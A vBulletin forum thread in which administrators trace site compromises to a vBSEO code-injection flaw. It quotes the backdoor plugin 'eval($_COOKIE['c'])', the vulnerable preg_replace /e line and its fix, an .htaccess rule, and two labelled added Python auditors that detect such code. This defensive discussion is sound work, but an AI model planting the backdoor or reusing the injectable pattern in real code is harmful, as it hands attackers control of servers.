Possible Exploit

  • Jafo
    Senior Member
    • Apr 2004
    • 278

    #16
    Just got a confirmation from vbseo that the patch was in their repo, but not in the current version. They said they have updated the current version just now to include the patch.. I really hope they notify their customer base because this exploit is a year old. Bots are probably pre-programmed with this attack vector and there are likely hundreds of them. If you have updated vbseo in the last year, you stand a good chance of being vulnerable. UPGRADE YOUR INSTALL NOW!

    Comment

    • Ace
      Senior Member
      • Apr 2004
      • 4051
      • 4.2.X

      #17
      Just in case - you do have the following .htaccess protection in all writable directories?

      Code:
      <Files ~ "\.(php\d*|cgi|pl|phtml)$">
      order allow,deny
      deny from all
      </Files>
      My Live vB5 Site - NZEating.com
      vBulletin Hosting | vBulletin Services - Need hosting for your vB? Need it installed? Something else? Let me take that hassle off your hands.

      Comment

      • Jafo
        Senior Member
        • Apr 2004
        • 278

        #18
        Originally posted by Ace
        Just in case - you do have the following .htaccess protection in all writable directories?

        Code:
        <Files ~ "\.(php\d*|cgi|pl|phtml)$">
        order allow,deny
        deny from all
        </Files>
        Yes we do and we even have admincp and vbseocp.php protected by apache auth..

        Trust me, the reason this happened is because that patch was missing.. Bots have been searching for this exploit for almost a year now.. When we upgraded to 3.6.0 the hole was reopened and the bots did what they do.

        Comment

        • kau
          Senior Member
          • Jul 2002
          • 772

          #19
          It is vBSEO.

          All our non-vBSEO sites did not get hacked.

          All our vBSEO sites without "Add Page Titles to External Links Anchor Text" enabled did not get hacked.

          All our vBSEO sites with "Add Page Titles to External Links Anchor Text" enabled got hacked.

          We have every single directory properly permissioned via Apache CONF file and by hand issuing CHMOD commands. We also have our AdminCP in a different directory and it is password protected through .htpasswd.

          There are no entries in Control Panel logs that relate to this plugin creation. It was done via injection.
          Group Builder

          Comment

          • briansol
            Senior Member
            • Apr 2006
            • 674
            • 3.6.x

            #20
            FYI, the bug has been confirmed and a patch release is en route.

            Comment

            • Wayne Luke
              vBulletin Technical Support Lead
              • Aug 2000
              • 73981

              #21
              Originally posted by DigitalCrowd
              I have a number of sites I've checked with VBSEO installed and they didn't have this plugin. However a few sites all with vBSEO have them. One site had a "test" plugin for ajax_complete and it referenced:

              eval($_COOKIE['c']);

              Here is a site that references a PHP compromise with similar code...

              http://translate.google.com/translate?hl=en&sl=zh-CN&u=http://www.dis9.com/tools&ei=nH8dT9XALMSKsQLH4dSdCw&sa=X&oi=translate&ct=result&resnum=2&ved=0CDYQ7gEwAQ&prev=/search%3Fq%3Deval(%24_COOKIE%5B%27c%27%5D)%3B%26hl%3Den%26safe%3Doff%26client%3Dsafari%26r ls%3Den%26prmd%3Dimvns

              This is a very bad plugin. Very bad. You need to remove it as quickly as possible. With it, your attackers could gain access to your entire server.
              Translations provided by Google.

              Wayne Luke
              The Rabid Badger - a vBulletin Cloud demonstration site.
              vBulletin 5 API

              Comment
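An audit for the kind of plugin described in the posts above, as an added example that is not code from the thread or from vBulletin: it flags plugin code that passes request input (directly or through an intermediate variable) to an evaluating function. The row layout (`hookname`, `title`, `phpcode`) is an assumption about the forum's plugin table, and the three rows are constructed samples.

```python
import re

SUPERGLOBAL = r"\$_(?:COOKIE|GET|POST|REQUEST|SERVER)\b"
SINKS = r"(?:eval|assert|create_function|system|passthru|shell_exec|exec)"

# Constructed sample rows (the first mirrors the plugin quoted in the thread).
ROWS = [
    {"hookname": "ajax_complete", "title": "test",
     "phpcode": "eval($_COOKIE['c']);"},
    {"hookname": "global_start", "title": "stats",
     "phpcode": "$x = $_POST [ 'p' ]; eval /* x */ ( base64_decode($x) );"},
    # Ordinary template rendering also calls eval(), so eval alone is not the signal.
    {"hookname": "forumhome_start", "title": "sidebar",
     "phpcode": r"""eval('$tpl = "' . fetch_template('bar') . '";');"""},
]

def tainted_vars(php):
    """Variables assigned from a request superglobal in the same statement."""
    return set(re.findall(r"(\$\w+)\s*=(?!=)\s*[^;]*?" + SUPERGLOBAL, php))

def audit_plugin(row):
    """Return findings for one plugin row; an empty list means nothing matched."""
    # Remove /* */ comments so they cannot separate a function name from its '('.
    code = re.sub(r"/\*.*?\*/", "", row["phpcode"], flags=re.S)
    sources = [SUPERGLOBAL] + [re.escape(v) + r"\b" for v in tainted_vars(code)]
    findings = []
    for call in re.finditer(r"\b(" + SINKS + r")\s*\(([^;]*)", code, flags=re.I):
        if any(re.search(src, call.group(2)) for src in sources):
            findings.append(
                f"{row['hookname']}/{row['title']}: {call.group(1)}() on request input")
    return findings

def audit_all(rows):
    """Flatten the findings for every row."""
    return [f for row in rows for f in audit_plugin(row)]

if __name__ == "__main__":
    for finding in audit_all(ROWS):
        print(finding)
```

A clean result only means no row matched these patterns; rows that do match should be compared against the plugins the administrators actually installed.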

              • DigitalCrowd
                Senior Member
                • Aug 2000
                • 111
                • 3.6.x

                #22
                Yep, I removed it as soon as I saw it.

                Comment

                • briansol
                  Senior Member
                  • Apr 2006
                  • 674
                  • 3.6.x

                  #23

                  Comment

                  • Talaturen
                    New Member
                    • Dec 2005
                    • 12
                    • 3.8.x

                    #24
                    It seems like people believe this latest vBSEO patch fixes this. IT DOES NOT. 3.6.0 of vBSEO had this patch since release (so users of vBSEO 3.6.0 don't have to apply the patch today as it doesn't patch anything) and my forum has been running with it. This exploit plugin has been added while the forums were already running vBSEO 3.6.0! The current code is still vulnerable!

                    Comment

                    • Loco.M
                      Senior Member
                      • Mar 2005
                      • 4319
                      • 3.5.x

                      #25
                      Originally posted by Jafo
                      Here it is folks, in functions_vbseocp_abstract.php

                      PHP Code:
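                      public static function proc_deutf($ptxt, $tocharset)
                      {
                      // /e modifier: the replacement string is evaluated as PHP code; the captured text $1 is placed inside double quotes
                      $ptxt = preg_replace('#\'([^\']*)(\'\s*\=\>)#mie', '"\'".(($_s = iconv("UTF-8", \''.$tocharset.'\', "$1")) ? $_s : "$1").stripslashes(\'$2\')', $ptxt);
                      return $ptxt;
                      }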

                      I recommended a patch here over a YEAR ago when we were getting hacked and they said they were going to put it in the latest version.. They did not.. This needs to be:

                      PHP Code:
                      public static function proc_deutf($ptxt, $tocharset)
                      {
                      // Same call, with the captured text $1 placed inside single quotes in the evaluated code
                      $ptxt = preg_replace('#\'([^\']*)(\'\s*\=\>)#mie', '"\'".(($_s = iconv("UTF-8", \''.$tocharset.'\', \'$1\')) ? $_s : \'$1\').stripslashes(\'$2\')', $ptxt);
                      return $ptxt;
                      }

                      Ouch.. that's a lot of sites at risk for a year..
                      -- Web Developer for hire
                      ---Online Marketing Tools and Articles

                      Comment
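Since the thread disagrees about which form of the line a given install contains, here is a checker for it, as an added example that is not code from the thread or from vBSEO. It parses one `preg_replace()` call and reports whether the pattern uses `/e` and, if so, whether any backreference sits inside a double-quoted string in the evaluated replacement. The function names are hypothetical and the two sample lines are the ones quoted in the post above.

```python
import re

# Constructed input: the two proc_deutf() lines as quoted in the thread.
UNPATCHED = r"""$ptxt = preg_replace('#\'([^\']*)(\'\s*\=\>)#mie', '"\'".(($_s = iconv("UTF-8", \''.$tocharset.'\', "$1")) ? $_s : "$1").stripslashes(\'$2\')', $ptxt);"""
PATCHED = r"""$ptxt = preg_replace('#\'([^\']*)(\'\s*\=\>)#mie', '"\'".(($_s = iconv("UTF-8", \''.$tocharset.'\', \'$1\')) ? $_s : \'$1\').stripslashes(\'$2\')', $ptxt);"""

def read_sq(src, i):
    """Read the PHP single-quoted literal opening at src[i]; return (value, next index)."""
    out, i = [], i + 1
    while src[i] != "'":
        if src[i] == "\\" and src[i + 1] in "'\\":
            i += 1  # \' and \\ are the only escapes inside single quotes
        out.append(src[i])
        i += 1
    return "".join(out), i + 1

def audit_preg_replace(line):
    """Return 'no-e', 'e-single-quoted' or 'e-double-quoted' for one preg_replace() call."""
    start = line.index("preg_replace(") + len("preg_replace(")
    pattern, i = read_sq(line, line.index("'", start))
    # Modifiers follow the closing delimiter (assumes the same character opens and closes).
    if "e" not in pattern[pattern.rindex(pattern[0]) + 1:]:
        return "no-e"
    # Rebuild the replacement argument: this is the PHP code that /e evaluates.
    parts, i = [], line.index(",", i) + 1
    while line[i] != ",":
        if line[i] == "'":
            text, i = read_sq(line, i)
            parts.append(text)
        else:
            var = re.match(r"\$\w+", line[i:])  # concatenated variable -> placeholder
            parts.append("VAR" if var else "")
            i += var.end() if var else 1
    # Walk that code and record which kind of string each backreference $N sits in.
    code, quote, contexts, j = "".join(parts), None, set(), 0
    while j < len(code):
        c = code[j]
        if quote and c == "\\":
            j += 1  # skip the escaped character
        elif quote and c == quote:
            quote = None
        elif not quote and c in "'\"":
            quote = c
        elif c == "$" and code[j + 1:j + 2].isdigit():
            contexts.add(quote)
        j += 1
    return "e-double-quoted" if '"' in contexts else "e-single-quoted"
```

PHP deprecated the `/e` modifier in 5.5 and removed it in 7.0; `preg_replace_callback()` is its replacement, so any `/e` result is worth a closer look whatever the quoting.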

                      • Jafo
                        Senior Member
                        • Apr 2004
                        • 278

                        #26
                        Originally posted by Talaturen
                        It seems like people believe this latest vBSEO patch fixes this. IT DOES NOT. 3.6.0 of vBSEO had this patch since release (so users of vBSEO 3.6.0 don't have to apply the patch today as it doesn't patch anything) and my forum has been running with it. This exploit plugin has been added while the forums were already running vBSEO 3.6.0! The current code is still vulnerable!
                        You are wrong, the patch was NOT in 3.6.0 until we discovered this TODAY. I know, I checked.

                        Comment

                        • Wayne Luke
                          vBulletin Technical Support Lead
                          • Aug 2000
                          • 73981

                          #27
                          Originally posted by Talaturen
                          It seems like people believe this latest vBSEO patch fixes this. IT DOES NOT. 3.6.0 of vBSEO had this patch since release (so users of vBSEO 3.6.0 don't have to apply the patch today as it doesn't patch anything) and my forum has been running with it. This exploit plugin has been added while the forums were already running vBSEO 3.6.0! The current code is still vulnerable!
                          It is a pretty old unknown exploit then to be in both 3.8.X and 4.X. There was an issue with group searching in both versions and this was patched before 4.1.4 was released so it could be related to that if people didn't apply both patches or they were exploited before they patched. I haven't seen anything pointing to a new exploit yet though. We've had several potential issues submitted to us but they could not be replicated. If you have additional information then you should share it.

                          Comment

                          • Jafo
                            Senior Member
                            • Apr 2004
                            • 278

                            #28
                            The problem is, the patch was somehow not included in the latest release, so it was NOT patched until later today.

                            Comment

                            • Talaturen
                              New Member
                              • Dec 2005
                              • 12
                              • 3.8.x

                              #29
                              Originally posted by Jafo
                              You are wrong, the patch was NOT in 3.6.0 until we discovered this TODAY. I know, I checked.
                              Nope, you are wrong. I've checked backups on the _abstract file from around 5 days ago (and the file hasn't been changed since I updated to 3.6.0). The same patch they are telling us to apply is already applied on that file, and other users on vBSEO forum have confirmed this too.

                              Originally posted by Wayne Luke
                              It is a pretty old unknown exploit then to be in both 3.8.X and 4.X. There was an issue with group searching in both versions and this was patched before 4.1.4 was released so it could be related to that if people didn't apply both patches or they were exploited before they patched. I haven't seen anything pointing to a new exploit yet though. We've had several potential issues submitted to us but they could not be replicated. If you have additional information then you should share it.
                              I have no idea if it is in 3.8.X, it happened to me around 4.1.8 (I can't know for sure because all I can see is the plugin id, and it's after I installed a plugin sometime in November, and before I updated to vBulletin 4.1.10). I've always been quick with applying security patches too. I don't think this is an exploit in vBulletin itself, because so far affected users are only people who use vBSEO (from what I have seen, I may be wrong). I don't know much more than that unless it was a vulnerability that has been fixed between 4.1.8 and 4.1.10 of vBulletin, it is very likely to still be active.

                              Comment

                              • Wayne Luke
                                vBulletin Technical Support Lead
                                • Aug 2000
                                • 73981

                                #30
                                Originally posted by Talaturen
                                I have no idea if it is in 3.8.X, it happened to me around 4.1.8 (I can't know for sure because all I can see is the plugin id, and it's after I installed a plugin sometime in November, and before I updated to vBulletin 4.1.10). I've always been quick with applying security patches too. I don't think this is an exploit in vBulletin itself, because so far affected users are only people who use vBSEO (from what I have seen, I may be wrong). I don't know much more than that unless it was a vulnerability that has been fixed between 4.1.8 and 4.1.10 of vBulletin, it is very likely to still be active.
                                You're posting in the 3.8X forum.

                                Comment
